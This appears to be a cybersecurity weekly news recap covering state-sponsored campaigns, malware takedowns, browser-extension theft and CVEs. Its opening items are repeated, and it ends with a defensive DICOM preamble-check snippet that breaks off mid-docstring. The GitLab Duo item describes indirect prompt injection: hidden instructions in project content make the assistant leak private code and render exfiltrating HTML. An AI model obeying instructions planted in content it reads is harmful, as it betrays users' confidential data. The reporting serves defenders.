    APT28 Hackers Target Western Logistics and Tech Firms — Several cybersecurity and intelligence agencies from Australia, Europe, and the United States issued a joint alert warning of a campaign, ongoing since 2022, by the Russian state-sponsored threat actor APT28 targeting Western logistics entities and technology companies. "This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors' wide scale targeting of IP cameras in Ukraine and bordering NATO nations," the agencies said. The attacks are designed to steal sensitive information and maintain long-term persistence on compromised hosts.
    Chinese Threat Actors Exploit Ivanti EPMM Flaws — The China-nexus cyber espionage group tracked as UNC5221 has been attributed to the exploitation of a pair of security flaws affecting Ivanti Endpoint Manager Mobile (EPMM) software to target a wide range of sectors across Europe, North America, and the Asia-Pacific region. The intrusions leverage the vulnerabilities to obtain a reverse shell and drop malicious payloads like KrustyLoader, which is known to deliver the Sliver command-and-control (C2) framework. "UNC5221 demonstrates a deep understanding of EPMM's internal architecture, repurposing legitimate system components for covert data exfiltration," EclecticIQ said. "Given EPMM's role in managing and pushing configurations to enterprise mobile devices, a successful exploitation could allow threat actors to remotely access, manipulate, or compromise thousands of managed devices across an organization."
    Over 100 Google Chrome Extensions Mimic Popular Tools — An unknown threat actor has been creating malicious Chrome browser extensions since February 2024 that masquerade as seemingly benign utilities such as DeepSeek, Manus, DeBank, FortiVPN, and Site Stats but incorporate covert functionality to exfiltrate data, receive commands, and execute arbitrary code. Links to these browser add-ons are hosted on specially crafted sites to which users are likely redirected via phishing and social media posts. While the extensions appear to offer the advertised features, they also stealthily facilitate credential and cookie theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation. Several of these extensions have been taken down by Google.
    CISA Warns SaaS Providers of Attacks Targeting Cloud Environments — The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned that SaaS companies are under threat from bad actors on the prowl for cloud applications with default configurations and elevated permissions. While the agency did not attribute the activity to a specific group, the advisory said enterprise backup vendor Commvault is monitoring cyber threat activity targeting applications hosted in its Microsoft Azure cloud environment. "Threat actors may have accessed client secrets for Commvault's Microsoft 365 (M365) backup software-as-a-service (SaaS) solution, hosted in Azure," CISA said. "This provided the threat actors with unauthorized access to Commvault's customers' M365 environments that have application secrets stored by Commvault."
    GitLab AI Coding Assistant Flaws Could Be Used to Inject Malicious Code — Cybersecurity researchers have discovered an indirect prompt injection flaw in GitLab's artificial intelligence (AI) assistant, Duo, that could have allowed attackers to steal source code and inject untrusted HTML into its responses, which could then be used to direct victims to malicious websites. The attack could also leak confidential issue data, such as zero-day vulnerability details. All that's required is for the attacker to get the chatbot to interact with a merge request (MR), taking advantage of the fact that GitLab Duo has extensive access to the platform. "By embedding hidden instructions in seemingly harmless project content, we were able to manipulate Duo's behavior, exfiltrate private source code, and demonstrate how AI responses can be leveraged for unintended and harmful outcomes," Legit Security said. One variation of the attack hid a malicious instruction in an otherwise legitimate piece of source code, while another exploited Duo's real-time, asynchronous rendering of markdown responses. Because Duo begins rendering output line by line rather than waiting until the entire response is generated and sending it all at once, an attacker can introduce malicious HTML that accesses sensitive data and exfiltrates it to a remote server. The issues have been patched by GitLab following responsible disclosure.

    🔥 Trending CVEs

    Software vulnerabilities remain one of the simplest—and most effective—entry points for attackers. Each week uncovers new flaws, and even small delays in patching can escalate into serious security incidents. Staying ahead means acting fast. Below is this week's list of high-risk vulnerabilities that demand attention. Review them carefully, apply updates without delay, and close the doors before they're forced open. This week's list includes — CVE-2025-34025, CVE-2025-34026, CVE-2025-34027, CVE-2025-30911, CVE-2024-57273, CVE-2024-54780, CVE-2024-54779, CVE-2025-41229, CVE-2025-4322, CVE-2025-47934, CVE-2025-30193, CVE-2025-0993, CVE-2025-36535, CVE-2025-47949, CVE-2025-40775, CVE-2025-20152, CVE-2025-4123, CVE-2025-5063, CVE-2025-37899, CVE-2025-26817, CVE-2025-47947, CVE-2025-3078, CVE-2025-3079, and CVE-2025-4978.

    📰 Around the Cyber World

    Sandworm Drops New Wiper in Ukraine — The Russia-aligned Sandworm group intensified destructive operations against Ukrainian energy companies, deploying a new wiper named ZEROLOT. "The infamous Sandworm group concentrated heavily on compromising Ukrainian energy infrastructure. In recent cases, it deployed the ZEROLOT wiper in Ukraine. For this, the attackers abused Active Directory Group Policy in the affected organizations," ESET Director of Threat Research Jean-Ian Boutin said. Another Russian hacking group, Gamaredon, remained the most prolific actor targeting the East European nation, enhancing its malware obfuscation and introducing PteroBox, a file stealer that leverages Dropbox.
    Signal Says No to Recall — Signal has released a new version of its messaging app for Windows that, by default, blocks Windows Recall from periodically taking screenshots of the app. "Although Microsoft made several adjustments over the past twelve months in response to critical feedback, the revamped version of Recall still places any content that's displayed within privacy-preserving apps like Signal at risk," Signal said. "As a result, we are enabling an extra layer of protection by default on Windows 11 in order to help maintain the security of Signal Desktop on that platform even though it introduces some usability trade-offs. Microsoft has simply given us no other option." Microsoft began officially rolling out Recall last month.
    Russia Introduces New Law to Track Foreigners Using Their Smartphones — The Russian government has introduced a new law that makes installing a tracking app mandatory for all foreign nationals in the Moscow region, gathering their real-time location, fingerprints, facial photograph, and residential information. "The adopted mechanism will allow, using modern technologies, to strengthen control in the field of migration and will also contribute to reducing the number of violations and crimes in this area," Vyacheslav Volodin, chairman of the State Duma, said. "If migrants change their actual place of residence, they will be required to inform the Ministry of Internal Affairs within three working days." A proposed four-year trial period begins on September 1, 2025, and runs until September 1, 2029.
    Dutch Government Passes Law to Criminalize Cyber Espionage — The Dutch government has approved a law criminalizing a wide range of espionage activities, including digital espionage, in an effort to protect national security, critical infrastructure, and high-quality technologies. Under the amended law, leaking sensitive information that is not classified as a state secret, or engaging in activities on behalf of a foreign government that harm Dutch interests, can also result in criminal charges. "Foreign governments are also interested in non-state-secret, sensitive information about a particular economic sector or about political decision-making," the government said. "Such information can be used to influence political processes, weaken the Dutch economy or play allies against each other. Espionage can also involve actions other than sharing information."
    Microsoft Announces Availability of Quantum-Resistant Algorithms in SymCrypt — Microsoft has revealed that it's making post-quantum cryptography (PQC) capabilities, including ML-KEM and ML-DSA, available for Windows Insiders (Canary Channel Build 27852 and higher) and Linux (SymCrypt-OpenSSL version 1.9.0). "This advancement will enable customers to commence their exploration and experimentation of PQC within their operational environments," Microsoft said. "By obtaining early access to PQC capabilities, organizations can proactively assess the compatibility, performance, and integration of these novel algorithms alongside their existing security infrastructure."
    New Malware DOUBLELOADER Uses ALCATRAZ for Obfuscation — The open-source obfuscator ALCATRAZ has been seen within a new generic loader dubbed DOUBLELOADER, which has been deployed alongside Rhadamanthys Stealer infections since December 2024. The malware collects host information, requests an updated version of itself, and starts beaconing to a hardcoded IP address stored within the binary. "Obfuscators such as ALCATRAZ end up increasing the complexity when triaging malware," Elastic Security Labs said. "Its main goal is to hinder binary analysis tools and increase the time of the reverse engineering process through different techniques; such as hiding the control flow or making decompilation hard to follow."
    New Formjacking Campaign Targets WooCommerce Sites — Cybersecurity researchers have detected a sophisticated formjacking campaign targeting WooCommerce sites. The malware, per Wordfence, injects a fake but professional-looking payment form into legitimate checkout processes and exfiltrates sensitive customer data to an external server. Further analysis revealed that the infection likely originated from a compromised WordPress admin account, which was used to inject malicious JavaScript via the Simple Custom CSS and JS plugin, which allows administrators to add custom code. "Unlike traditional card skimmers that simply overlay existing forms, this variant carefully integrates with the WooCommerce site's design and payment workflow, making it particularly difficult for site owners and users to detect," the WordPress security company said. "The malware author repurposed the browser's localStorage mechanism – typically used by websites to remember user preferences – to silently store stolen data and maintain access even after page reloads or when navigating away from the checkout page."
    E.U. Sanctions Stark Industries — The European Union (EU) has announced sanctions against 21 individuals and six entities in Russia over its "destabilising actions" in the region. One of the sanctioned entities is Stark Industries, a bulletproof hosting provider accused of acting as an "enabler of various Russian state-sponsored and affiliated actors to conduct destabilising activities including, information manipulation interference and cyber attacks against the Union and third countries." The sanctions also target its CEO Iurie Neculiti and owner Ivan Neculiti. Stark Industries was previously spotlighted by independent cybersecurity journalist Brian Krebs, who detailed its use in DDoS attacks in Ukraine and across Europe. In August 2024, Team Cymru said it had discovered 25 Stark-assigned IP addresses used to host domains associated with FIN7 activity and that it had been working with Stark Industries for several months to identify and reduce abuse of its systems. The sanctions also target Kremlin-backed manufacturers of drones and radio communication equipment used by the Russian military, as well as those involved in GPS signal jamming in the Baltic states and disrupting civil aviation.
    The Mask APT Unmasked as Tied to the Spanish Government — The mysterious threat actor known as The Mask has been identified as run by the Spanish government, according to a report published by TechCrunch, citing people who worked at Kaspersky at the time and had knowledge of the investigation. The Russian cybersecurity company first exposed the hacking group in 2014, linking it to highly sophisticated attacks since at least 2007 targeting high-profile organizations such as governments, diplomatic entities, and research institutions. A majority of the group's attacks have targeted Cuba, followed by hundreds of victims in Brazil, Morocco, Spain, and Gibraltar. While Kaspersky has not publicly attributed it to a specific country, the latest revelation makes The Mask one of the few Western government hacking groups ever discussed in public, alongside the Equation Group, the Lamberts, and Animal Farm.
    Social Engineering Scams Target Coinbase Users — Earlier this month, cryptocurrency exchange Coinbase revealed that unknown threat actors had breached its systems by bribing customer support agents in India and stolen data belonging to nearly 70,000 customers. According to blockchain security firm SlowMist, Coinbase users have been the target of social engineering scams since the start of the year, bombarded with SMS messages claiming to be withdrawal requests and seeking their confirmation as part of a "sustained and organized scam campaign." The goal is to induce a false sense of urgency and trick victims into calling a number, eventually convincing them to transfer funds to a "secure" wallet with a seed phrase pre-generated by the attackers, who then drain the assets. The activity is assessed to be carried out primarily by two groups: low-skilled attackers ("skids") from the Com community, and organized cybercrime groups based in India. "Using spoofed PBX phone systems, scammers impersonate Coinbase support and claim there's been 'unauthorized access' or 'suspicious withdrawals' on the user's account," SlowMist said. "They create a sense of urgency, then follow up with phishing emails or texts containing fake ticket numbers or 'recovery links.'"
    Delta Can Sue CrowdStrike Over July 2024 Mega Outage — Delta Air Lines, which had its systems crippled and almost 7,000 flights canceled in the wake of the massive outage caused by a faulty CrowdStrike update in mid-July 2024, has been given the green light to pursue its lawsuit against the cybersecurity company. A judge in the U.S. state of Georgia ruled that Delta can try to prove that CrowdStrike was grossly negligent in pushing a defective update for its Falcon software to customers. The update crashed 8.5 million Windows devices across the world. CrowdStrike previously claimed that the airline had rejected technical support offers from both itself and Microsoft. In a statement shared with Reuters, lawyers representing CrowdStrike said they were "confident the judge will find Delta's case has no merit, or will limit damages to the 'single-digit millions of dollars' under Georgia law." The development comes months after MGM Resorts International agreed to pay million to settle multiple class-action lawsuits related to a data breach in 2019 and a ransomware attack the company experienced in 2023.
    THEHACKERNEWS.COM
    ⚡ Weekly Recap: APT Campaigns, Browser Hijacks, AI Malware, Cloud Breaches and Critical CVEs
Cyber threats don't show up one at a time anymore. They're layered, planned, and often stay hidden until it's too late. For cybersecurity teams, the key isn't just reacting to alerts—it's spotting early signs of trouble before they become real threats. This update is designed to deliver clear, accurate insights based on real patterns and changes we can verify. With today's complex systems, we need focused analysis—not noise. What you'll see here isn't just a list of incidents, but a clear look at where control is being gained, lost, or quietly tested.

⚡ Threat of the Week

Lumma Stealer, DanaBot Operations Disrupted — A coalition of private sector companies and law enforcement agencies has taken down the infrastructure associated with Lumma Stealer and DanaBot. Charges have also been unsealed against 16 individuals for their alleged involvement in the development and deployment of DanaBot. The malware is equipped to siphon data from victim computers, hijack banking sessions, and steal device information. More uniquely, though, DanaBot has also been used for hacking campaigns that appear to be linked to Russian state-sponsored interests. All of that makes DanaBot a particularly clear example of how commodity malware has been repurposed by Russian state hackers for their own goals. In tandem, about 2,300 domains that acted as the command-and-control (C2) backbone for the Lumma information stealer have been seized, alongside the takedown of 300 servers and the neutralization of 650 domains that were used to launch ransomware attacks. The actions against international cybercrime in the past few days constituted the latest phase of Operation Endgame.
🔔 Top News

Threat Actors Use TikTok Videos to Distribute Stealers — While ClickFix has become a popular social engineering tactic to deliver malware, threat actors have been observed using artificial intelligence (AI)-generated videos uploaded to TikTok to deceive users into running malicious commands on their systems and deploying malware like Vidar and StealC under the guise of activating pirated versions of Windows, Microsoft Office, CapCut, and Spotify. "This campaign highlights how attackers are ready to weaponize whichever social media platforms are currently popular to distribute malware," Trend Micro said.

APT28 Hackers Target Western Logistics and Tech Firms — Several cybersecurity and intelligence agencies from Australia, Europe, and the United States issued a joint alert warning of a campaign orchestrated by the Russian state-sponsored threat actor APT28 targeting Western logistics entities and technology companies since 2022. "This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors' wide scale targeting of IP cameras in Ukraine and bordering NATO nations," the agencies said. The attacks are designed to steal sensitive information and maintain long-term persistence on compromised hosts.

Chinese Threat Actors Exploit Ivanti EPMM Flaws — The China-nexus cyber espionage group tracked as UNC5221 has been attributed to the exploitation of a pair of security flaws affecting Ivanti Endpoint Manager Mobile (EPMM) software (CVE-2025-4427 and CVE-2025-4428) to target a wide range of sectors across Europe, North America, and the Asia-Pacific region. The intrusions leverage the vulnerabilities to obtain a reverse shell and drop malicious payloads like KrustyLoader, which is known to deliver the Sliver command-and-control (C2) framework.
"UNC5221 demonstrates a deep understanding of EPMM's internal architecture, repurposing legitimate system components for covert data exfiltration," EclecticIQ said. "Given EPMM's role in managing and pushing configurations to enterprise mobile devices, a successful exploitation could allow threat actors to remotely access, manipulate, or compromise thousands of managed devices across an organization." Over 100 Google Chrome Extensions Mimic Popular Tools — An unknown threat actor has been attributed to creating several malicious Chrome Browser extensions since February 2024 that masquerade as seemingly benign utilities such as DeepSeek, Manus, DeBank, FortiVPN, and Site Stats but incorporate covert functionality to exfiltrate data, receive commands, and execute arbitrary code. Links to these browser add-ons are hosted on specially crafted sites to which users are likely redirected to via phishing and social media posts. While the extensions appear to offer the advertised features, they also stealthily facilitate credential and cookie theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation. Several of these extensions have been taken down by Google. CISA Warns of SaaS Providers of Attacks Targeting Cloud Environments — The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned that SaaS companies are under threat from bad actors who are on the prowl for cloud applications with default configurations and elevated permissions. While the agency did not attribute the activity to a specific group, the advisory said enterprise backup platform Commvault is monitoring cyber threat activity targeting applications hosted in their Microsoft Azure cloud environment. "Threat actors may have accessed client secrets for Commvault's (Metallic) Microsoft 365 (M365) backup software-as-a-service (SaaS) solution, hosted in Azure," CISA said. 
"This provided the threat actors with unauthorized access to Commvault's customers' M365 environments that have application secrets stored by Commvault." GitLab AI Coding Assistant Flaws Could Be Used to Inject Malicious Code — Cybersecurity researchers have discovered an indirect prompt injection flaw in GitLab's artificial intelligence (AI) assistant Duo that could have allowed attackers to steal source code and inject untrusted HTML into its responses, which could then be used to direct victims to malicious websites. The attack could also leak confidential issue data, such as zero-day vulnerability details. All that's required is for the attacker to instruct the chatbot to interact with a merge request (or commit, issue, or source code) by taking advantage of the fact that GitLab Duo has extensive access to the platform. "By embedding hidden instructions in seemingly harmless project content, we were able to manipulate Duo's behavior, exfiltrate private source code, and demonstrate how AI responses can be leveraged for unintended and harmful outcomes," Legit Security said. One variation of the attack involved hiding a malicious instruction in an otherwise legitimate piece of source code, while another exploited Duo's parsing of markdown responses in real-time asynchronously. An attacker could leverage this behavior – that Duo begins rendering the output line by line rather than waiting until the entire response is generated and sending it all at once – to introduce malicious HTML code that can access sensitive data and exfiltrate the information to a remote server. The issues have been patched by GitLab following responsible disclosure. ‎️‍🔥 Trending CVEs Software vulnerabilities remain one of the simplest—and most effective—entry points for attackers. Each week uncovers new flaws, and even small delays in patching can escalate into serious security incidents. Staying ahead means acting fast. 
Below is this week's list of high-risk vulnerabilities that demand attention. Review them carefully, apply updates without delay, and close the doors before they're forced open. This week's list includes — CVE-2025-34025, CVE-2025-34026, CVE-2025-34027 (Versa Concerto), CVE-2025-30911 (RomethemeKit For Elementor WordPress plugin), CVE-2024-57273, CVE-2024-54780, and CVE-2024-54779 (pfSense), CVE-2025-41229 (VMware Cloud Foundation), CVE-2025-4322 (Motors WordPress theme), CVE-2025-47934 (OpenPGP.js), CVE-2025-30193 (PowerDNS), CVE-2025-0993 (GitLab), CVE-2025-36535 (AutomationDirect MB-Gateway), CVE-2025-47949 (Samlify), CVE-2025-40775 (BIND DNS), CVE-2025-20152 (Cisco Identity Services Engine), CVE-2025-4123 (Grafana), CVE-2025-5063 (Google Chrome), CVE-2025-37899 (Linux Kernel), CVE-2025-26817 (Netwrix Password Secure), CVE-2025-47947 (ModSecurity), CVE-2025-3078, CVE-2025-3079 (Canon Printers), and CVE-2025-4978 (NETGEAR).

📰 Around the Cyber World

Sandworm Drops New Wiper in Ukraine — The Russia-aligned Sandworm group intensified destructive operations against Ukrainian energy companies, deploying a new wiper named ZEROLOT. "The infamous Sandworm group concentrated heavily on compromising Ukrainian energy infrastructure. In recent cases, it deployed the ZEROLOT wiper in Ukraine. For this, the attackers abused Active Directory Group Policy in the affected organizations," ESET Director of Threat Research Jean-Ian Boutin said. Another Russian hacking group, Gamaredon, remained the most prolific actor targeting the East European nation, enhancing malware obfuscation and introducing PteroBox, a file stealer leveraging Dropbox.

Signal Says No to Recall — Signal has released a new version of its messaging app for Windows that, by default, blocks the ability of Windows to use Recall to periodically take screenshots of the app.
"Although Microsoft made several adjustments over the past twelve months in response to critical feedback, the revamped version of Recall still places any content that's displayed within privacy-preserving apps like Signal at risk," Signal said. "As a result, we are enabling an extra layer of protection by default on Windows 11 in order to help maintain the security of Signal Desktop on that platform even though it introduces some usability trade-offs. Microsoft has simply given us no other option." Microsoft began officially rolling out Recall last month. Russia Introduces New Law to Track Foreigners Using Their Smartphones — The Russian government has introduced a new law that makes installing a tracking app mandatory for all foreign nationals in the Moscow region. This includes gathering their real-time locations, fingerprint, face photograph, and residential information. "The adopted mechanism will allow, using modern technologies, to strengthen control in the field of migration and will also contribute to reducing the number of violations and crimes in this area," Vyacheslav Volodin, chairman of the State Duma, said. "If migrants change their actual place of residence, they will be required to inform the Ministry of Internal Affairs (MVD) within three working days." A proposed four-year trial period begins on September 1, 2025, and runs until September 1, 2029. Dutch Government Passes Law to Criminalize Cyber Espionage — The Dutch government has approved a law criminalizing a wide range of espionage activities, including digital espionage, in an effort to protect national security, critical infrastructure, and high-quality technologies. Under the amended law, leaking sensitive information that is not classified as a state secret or engaging in activities on behalf of a foreign government that harm Dutch interests can also result in criminal charges. 
"Foreign governments are also interested in non-state-secret, sensitive information about a particular economic sector or about political decision-making," the government said. "Such information can be used to influence political processes, weaken the Dutch economy or play allies against each other. Espionage can also involve actions other than sharing information." Microsoft Announces Availability of Quantum-Resistant Algorithms to SymCrypt — Microsoft has revealed that it's making post-quantum cryptography (PQC) capabilities, including ML-KEM and ML-DSA, available for Windows Insiders, Canary Channel Build 27852 and higher, and Linux, SymCrypt-OpenSSL version 1.9.0. "This advancement will enable customers to commence their exploration and experimentation of PQC within their operational environments," Microsoft said. "By obtaining early access to PQC capabilities, organizations can proactively assess the compatibility, performance, and integration of these novel algorithms alongside their existing security infrastructure." New Malware DOUBLELOADER Uses ALCATRAZ for Obfuscation — The open-source obfuscator ALCATRAZ has been seen within a new generic loader dubbed DOUBLELOADER, which has been deployed alongside Rhadamanthys Stealer infections starting December 2024. The malware collects host information, requests an updated version of itself, and starts beaconing to a hardcoded IP address (185.147.125[.]81) stored within the binary. "Obfuscators such as ALCATRAZ end up increasing the complexity when triaging malware," Elastic Security Labs said. "Its main goal is to hinder binary analysis tools and increase the time of the reverse engineering process through different techniques; such as hiding the control flow or making decompilation hard to follow." New Formjacking Campaign Targets WooCommerce Sites — Cybersecurity researchers have detected a sophisticated formjacking campaign targeting WooCommerce sites. 
The malware, per Wordfence, injects a fake but professional-looking payment form into legitimate checkout processes and exfiltrates sensitive customer data to an external server. Further analysis has revealed that the infection likely originated from a compromised WordPress admin account, which was used to inject malicious JavaScript via the Simple Custom CSS and JS plugin (or a similar one) that allows administrators to add custom code. "Unlike traditional card skimmers that simply overlay existing forms, this variant carefully integrates with the WooCommerce site's design and payment workflow, making it particularly difficult for site owners and users to detect," the WordPress security company said. "The malware author repurposed the browser's localStorage mechanism – typically used by websites to remember user preferences – to silently store stolen data and maintain access even after page reloads or when navigating away from the checkout page."

E.U. Sanctions Stark Industries — The European Union (E.U.) has announced sanctions against 21 individuals and six entities in Russia over its "destabilising actions" in the region. One of the sanctioned entities is Stark Industries, a bulletproof hosting provider that has been accused of acting as "enablers of various Russian state-sponsored and affiliated actors to conduct destabilising activities including, information manipulation interference and cyber attacks against the Union and third countries." The sanctions also target its CEO Iurie Neculiti and owner Ivan Neculiti. Stark Industries was previously spotlighted by independent cybersecurity journalist Brian Krebs, who detailed its use in DDoS attacks in Ukraine and across Europe. In August 2024, Team Cymru said it discovered 25 Stark-assigned IP addresses used to host domains associated with FIN7 activities and that it had been working with Stark Industries for several months to identify and reduce abuse of their systems.
The sanctions have also targeted Kremlin-backed manufacturers of drones and radio communication equipment used by the Russian military, as well as those involved in GPS signal jamming in Baltic states and disrupting civil aviation.

The Mask APT Unmasked as Tied to the Spanish Government — The mysterious threat actor known as The Mask (aka Careto) has been identified as being run by the Spanish government, according to a report published by TechCrunch, citing people who worked at Kaspersky at the time and had knowledge of the investigation. The Russian cybersecurity company first exposed the hacking group in 2014, linking it to highly sophisticated attacks since at least 2007 targeting high-profile organizations, such as governments, diplomatic entities, and research institutions. A majority of the group's attacks have targeted Cuba, followed by hundreds of victims in Brazil, Morocco, Spain, and Gibraltar. While Kaspersky has not publicly attributed it to a specific country, the latest revelation makes The Mask one of the few Western government hacking groups that has ever been discussed in public. This includes the Equation Group and the Lamberts (the U.S.), and Animal Farm (France).

Social Engineering Scams Target Coinbase Users — Earlier this month, cryptocurrency exchange Coinbase revealed that it was the victim of a malicious attack perpetrated by unknown threat actors who breached its systems by bribing customer support agents in India and siphoned funds from nearly 70,000 customers. According to blockchain security firm SlowMist, Coinbase users have been the target of social engineering scams since the start of the year, bombarded with SMS messages carrying fake withdrawal requests and seeking their confirmation as part of a "sustained and organized scam campaign."
The goal is to induce a false sense of urgency and trick them into calling a number, eventually convincing them to transfer the funds to a "secure" wallet with a seed phrase pre-generated by the attackers and ultimately drain the assets. It's assessed that the activities are primarily carried out by two groups: low-level skid attackers from the Com community and organized cybercrime groups based in India. "Using spoofed PBX phone systems, scammers impersonate Coinbase support and claim there's been 'unauthorized access' or 'suspicious withdrawals' on the user's account," SlowMist said. "They create a sense of urgency, then follow up with phishing emails or texts containing fake ticket numbers or 'recovery links.'"

Delta Can Sue CrowdStrike Over July 2024 Mega Outage — Delta Air Lines, which had its systems crippled and almost 7,000 flights canceled in the wake of a massive outage caused by a faulty update issued by CrowdStrike in mid-July 2024, has been given the green light to pursue its lawsuit against the cybersecurity company. A judge in the U.S. state of Georgia ruled that Delta can try to prove that CrowdStrike was grossly negligent by pushing a defective update to its Falcon software to customers. The update crashed 8.5 million Windows devices across the world. CrowdStrike previously claimed that the airline had rejected technical support offers from both itself and Microsoft. In a statement shared with Reuters, lawyers representing CrowdStrike said they were "confident the judge will find Delta's case has no merit, or will limit damages to the 'single-digit millions of dollars' under Georgia law." The development comes months after MGM Resorts International agreed to pay $45 million to settle multiple class-action lawsuits related to a data breach in 2019 and a ransomware attack the company experienced in 2023.
Storm-1516 Uses AI-Generated Media to Spread Disinformation — The Russian influence operation known as Storm-1516 (aka CopyCop) sought to spread narratives that undermined European support for Ukraine by amplifying fabricated stories on X about European leaders using drugs while traveling by train to Kyiv for peace talks. One of the posts was subsequently shared by Russian state media and Maria Zakharova, a senior official in Russia's foreign ministry, as part of what has been described as a coordinated disinformation campaign by EclecticIQ. The activity is also notable for the use of synthetic content depicting French President Emmanuel Macron, U.K. Labour Party leader Keir Starmer, and German Chancellor Friedrich Merz in possession of drugs during their return from Ukraine. "By attacking the reputation of these leaders, the campaign likely aimed to turn their own voters against them, using influence operations (IO) to reduce public support for Ukraine by discrediting the politicians who back it," the Dutch threat intelligence firm said.

Turkish Users Targeted by DBatLoader — AhnLab has disclosed details of a malware campaign that's distributing a malware loader called DBatLoader (aka ModiLoader) via banking-themed phishing emails, which then acts as a conduit to deliver SnakeKeylogger, an information stealer developed in .NET. "The DBatLoader malware distributed through phishing emails has the cunning behavior of exploiting normal processes (easinvoker.exe, loader.exe) through techniques such as DLL side-loading and injection for most of its behaviors, and it also utilizes normal processes (cmd.exe, powershell.exe, esentutl.exe, extrac32.exe) for behaviors such as file copying and changing policies," the company said.

SEC SIM-Swapper Sentenced to 14 Months for SEC X Account Hack — A 26-year-old Alabama man, Eric Council Jr., has been sentenced to 14 months in prison and three years of supervised release for using SIM swapping attacks to breach the U.S.
Securities and Exchange Commission's (SEC) official X account in January 2024 and falsely announce that the SEC had approved Bitcoin (BTC) Exchange Traded Funds (ETFs). Council Jr. (aka Ronin, Agiantschnauzer, and @EasyMunny) was arrested in October 2024 and pleaded guilty to the crime earlier this February. He has also been ordered to forfeit $50,000. According to court documents, Council used his personal computer to search incriminating phrases such as "SECGOV hack," "telegram sim swap," "how can I know for sure if I am being investigated by the FBI," "What are the signs that you are under investigation by law enforcement or the FBI even if you have not been contacted by them," "what are some signs that the FBI is after you," "Verizon store list," "federal identity theft statute," and "how long does it take to delete telegram account."

FBI Warns of Malicious Campaign Impersonating Government Officials — The U.S. Federal Bureau of Investigation (FBI) is warning of a new campaign that involves malicious actors impersonating senior U.S. federal or state government officials and their contacts to target individuals since April 2025. "The malicious actors have sent text messages and AI-generated voice messages — techniques known as smishing and vishing, respectively — that claim to come from a senior US official in an effort to establish rapport before gaining access to personal accounts," the FBI said. "One way the actors gain such access is by sending targeted individuals a malicious link under the guise of transitioning to a separate messaging platform." From there, the actor may present malware or introduce hyperlinks that lead intended targets to an actor-controlled site that steals login information.
DICOM Flaw Enables Attackers to Embed Malicious Code Within Medical Image Files — Praetorian has released a proof-of-concept (PoC) for a high-severity security flaw in Digital Imaging and Communications in Medicine (DICOM), the predominant file format for medical images, that enables attackers to embed malicious code within legitimate medical image files. CVE-2019-11687 (CVSS score: 7.8), originally disclosed in 2019 by Markel Picado Ortiz, stems from a design decision that allows arbitrary content at the start of the file, otherwise called the preamble, which enables the creation of malicious polyglots. Codenamed ELFDICOM, the PoC extends the attack surface to Linux environments, making it a much more potent threat. As a mitigation, it's advised to implement a DICOM preamble whitelist. "DICOM's file structure inherently allows arbitrary bytes at the beginning of the file, where Linux and most operating systems will look for magic bytes," Praetorian researcher Ryan Hennessee said. "[The whitelist] would check a DICOM file's preamble before it is imported into the system. This would allow known good patterns, such as 'TIFF' magic bytes, or '\x00' null bytes, while files with the ELF magic bytes would be blocked."

Cookie-Bite Attack Uses Chrome Extension to Steal Session Tokens — Cybersecurity researchers have demonstrated a new attack technique called Cookie-Bite that employs custom-made malicious browser extensions to steal "ESTAUTH" and "ESTSAUTHPERSISTNT" cookies in Microsoft Azure Entra ID and bypass multi-factor authentication (MFA). The attack has multiple moving parts to it: a custom Chrome extension that monitors authentication events and captures cookies; a PowerShell script that automates the extension deployment and ensures persistence; an exfiltration mechanism to send the cookies to a remote collection point; and a complementary extension to inject the captured cookies into the attacker's browser.
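The preamble whitelist recommended in the DICOM item above, written out as an added example (this is not Praetorian's ELFDICOM code): it reads the 128-byte preamble and the "DICM" prefix that DICOM PS3.10 places at offset 128, allows only an all-null preamble or the TIFF magic of the TIFF-DICOM dual format, rejects files whose preamble begins with ELF, PE or Mach-O magic, and denies everything else by default. The sample headers built by `make_sample` are constructed test data, not real medical images.

```python
"""Preamble allowlist check for DICOM Part 10 files.

Added example, not Praetorian's ELFDICOM code: implements the mitigation the
item above recommends, an allowlist of known-good 128-byte preamble patterns,
so a DICOM file whose preamble carries foreign executable magic (ELF, PE,
Mach-O) is rejected before it is imported into a PACS or viewer. Offsets
follow the DICOM PS3.10 layout; the magic values are the public ELF, PE,
Mach-O and TIFF signatures.
"""
from dataclasses import dataclass

PREAMBLE_LEN = 128            # PS3.10: preamble content is unconstrained
DICM_PREFIX = b"DICM"         # 4-byte prefix that follows the preamble
HEADER_LEN = PREAMBLE_LEN + len(DICM_PREFIX)

# Allowlist: an all-null preamble, or the TIFF magic used by the documented
# TIFF-DICOM dual format (little-endian "II*\0" or big-endian "MM\0*").
ALLOWED_PREFIXES = (b"II*\x00", b"MM\x00*")

# Executable signatures that have no legitimate reason to sit at offset 0 of
# a medical image. Checked first so the rejection reason names the polyglot.
BLOCKED_PREFIXES = {
    b"\x7fELF": "ELF",
    b"MZ": "PE/DOS",
    b"\xfe\xed\xfa\xce": "Mach-O (32-bit)",
    b"\xfe\xed\xfa\xcf": "Mach-O (64-bit)",
    b"\xca\xfe\xba\xbe": "Mach-O (fat)",
}


@dataclass(frozen=True)
class Verdict:
    allowed: bool
    reason: str


def check_preamble(data: bytes) -> Verdict:
    """Decide whether a file starting with `data` may be imported.

    Only the first 132 bytes matter; pass the whole file or just a prefix.
    Anything not explicitly on the allowlist is rejected (default deny).
    """
    if len(data) < HEADER_LEN:
        return Verdict(False, "truncated: shorter than preamble + 'DICM'")
    if data[PREAMBLE_LEN:HEADER_LEN] != DICM_PREFIX:
        return Verdict(False, "missing 'DICM' prefix at offset 128")
    preamble = data[:PREAMBLE_LEN]
    for magic, name in BLOCKED_PREFIXES.items():
        if preamble.startswith(magic):
            return Verdict(False, f"preamble carries {name} magic bytes")
    if preamble == bytes(PREAMBLE_LEN):
        return Verdict(True, "all-null preamble")
    if preamble.startswith(ALLOWED_PREFIXES):
        return Verdict(True, "TIFF magic (TIFF-DICOM dual format)")
    return Verdict(False, "preamble not on allowlist")


def check_file(path: str) -> Verdict:
    """Convenience wrapper: read only the header bytes from disk."""
    with open(path, "rb") as fh:
        return check_preamble(fh.read(HEADER_LEN))


def make_sample(preamble_start: bytes, with_prefix: bool = True) -> bytes:
    """Construct a minimal Part 10 header for testing (constructed data).

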